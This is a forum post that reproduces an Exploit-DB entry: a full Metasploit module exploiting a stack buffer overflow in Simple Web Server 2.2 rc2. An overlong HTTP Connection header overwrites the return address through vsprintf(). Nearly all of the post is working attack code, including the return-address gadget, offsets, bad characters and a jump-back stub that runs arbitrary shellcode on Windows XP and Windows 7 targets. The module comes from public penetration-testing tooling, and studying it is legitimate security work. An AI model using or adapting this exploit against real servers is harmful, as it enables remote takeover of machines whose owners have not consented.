Simple Web Server Connection Header Buffer Overflow

Wubi · July 24, 2012

[table=width: 500, class: grid]

[tr]

[td]EDB-ID: 20028[/td]

[td]CVE: N/A [/td]

[td]OSVDB-ID: N/A[/td]

[/tr]

[tr]

[td]Author: metasploit[/td]

[td]Published: 2012-07-23[/td]

[td]Verified: [/td]

[/tr]

[tr]

[td]Exploit Code: [/td]

[td]Vulnerable App: N/A[/td]

[td][/td]

[/tr]

[/table]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

    include Msf::Exploit::Remote::HttpClient

    def initialize(info={})
        super(update_info(info,
            'Name'        => "Simple Web Server Connection Header Buffer Overflow",
            'Description' => %q{
                This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
                can send a long string data in the Connection Header to causes an overflow on the
                stack when function vsprintf() is used, and gain arbitrary code execution. The
                module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
            },
            'License'     => MSF_LICENSE,
            'Author'      =>
                [
                    'mr.pr0n', # Vulnerability Discovery and PoC
                    'juan' # Metasploit module
                ],
            'References' =>
                [
                    ['EDB', '19937'],
                    ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
                ],
            'Payload'    =>
                {
                    'BadChars' => "\x00\x0a\x0d",
                    'Space' => 2048,
                    'DisableNops' => true,
                    'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
                },
            'DefaultOptions' =>
                {
                    'EXITFUNC' => "process",
                },
            'Platform' => 'win',
            'Targets'  =>
                [
                    [
                        'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
                        {
                            'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
                            'Offset' => 2048,
                            'OffsetEDI' => 84
                        }
                    ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jul 20 2012",
            'DefaultTarget'  => 0))
    end

    def check
        res = send_request_raw({'uri'=>'/'})
        if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
            return Exploit::CheckCode::Vulnerable
        end

        return Exploit::CheckCode::Safe
    end

    def exploit

        sploit = payload.encoded
        sploit << rand_text(target['Offset'] - sploit.length)
        sploit << [target.ret].pack("V") # eip
        sploit << rand_text(target['OffsetEDI'])
        sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string

        print_status("Trying target #{target.name}...")

        connect

        send_request_cgi({
            'uri'        => '/',
            'version'    => '1.1',
            'method'     => 'GET',
            'connection' => sploit
        })

        disconnect

    end
end

Sign In

Simple Web Server Connection Header Buffer Overflow

Recommended Posts

Wubi

Join the conversation

Browse

Activity

Pages